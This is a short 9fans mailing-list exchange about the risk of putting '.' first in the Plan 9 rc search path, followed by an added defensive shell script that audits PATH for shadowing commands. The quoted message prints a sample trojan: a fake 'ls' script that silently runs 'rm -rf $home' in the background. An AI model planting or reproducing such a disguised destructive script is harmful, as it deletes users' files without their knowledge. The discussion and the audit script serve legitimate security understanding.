Hello,
Removing files is not worth doing.
The victim will immediately find what happened and will recover his files
and then will consider what made the trouble.
I don't say (. /bin) is safe in an untrusted environment.
Someone might steal my private info using some trick.
Security is a tradeoff with convenience.
I guess we (members of 9fans) are happy enough working in a trusted
environment.
Kenji Arisawa
On 2007/10/27, at 18:03, roger peppe wrote:
1) rc: the value of $path is (. /bin). It is a classic case not to
have . as the first directory when searching for programs - it allows
Trojan horses to form.
if you're the only one using your system, how could this be a problem?
to be fair, if i'd put a file in /n/sources/contrib/rog/ls:
#!/bin/rc
rm -rf $home &
ls $* |* | grep -v ls
then i'm sure there'd be one or two unhappy people around...
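
An added example, not part of the original thread: a defensive check for the search-order issue discussed above, reporting path entries that resolve relative to the current directory and files in a directory that would shadow system commands when "." is searched first. It assumes a POSIX sh colon-separated PATH string rather than rc's $path list; the function names are hypothetical.

```shell
#!/bin/sh
# Added example: defensive audit of a command search path.
# Assumes a POSIX colon-separated PATH string (rc keeps $path as a list).

# risky_path_entries PATHSTRING
# Prints "position:entry" for every entry that is not an absolute directory.
# An empty entry counts: POSIX shells treat it as the current directory.
risky_path_entries() {
    _rest=$1:
    _pos=1
    while [ -n "$_rest" ]; do
        _entry=${_rest%%:*}
        _rest=${_rest#*:}
        case $_entry in
            /*) ;;
            '') echo "$_pos:(empty, means cwd)" ;;
            *)  echo "$_pos:$_entry" ;;
        esac
        _pos=$((_pos + 1))
    done
}

# shadowing_files DIR PATHSTRING
# Prints each executable file in DIR whose name matches a command found in an
# absolute directory of PATHSTRING: it would run instead of that command
# whenever DIR is the working directory and "." is searched first.
shadowing_files() {
    _dir=$1
    for _f in "$_dir"/*; do
        [ -f "$_f" ] && [ -x "$_f" ] || continue
        _name=${_f##*/}
        _scan=$2:
        while [ -n "$_scan" ]; do
            _d=${_scan%%:*}
            _scan=${_scan#*:}
            case $_d in /*) ;; *) continue ;; esac
            if [ "$_d" != "$_dir" ] && [ -x "$_d/$_name" ]; then
                echo "$_name shadows $_d/$_name"
                break
            fi
        done
    done
}

# The search order quoted in the thread, written as a colon-separated string.
risky_path_entries ".:/bin"    # prints 1:.
```

Running `shadowing_files . "$PATH"` in a directory obtained from someone else lists the files there that would take precedence over installed commands.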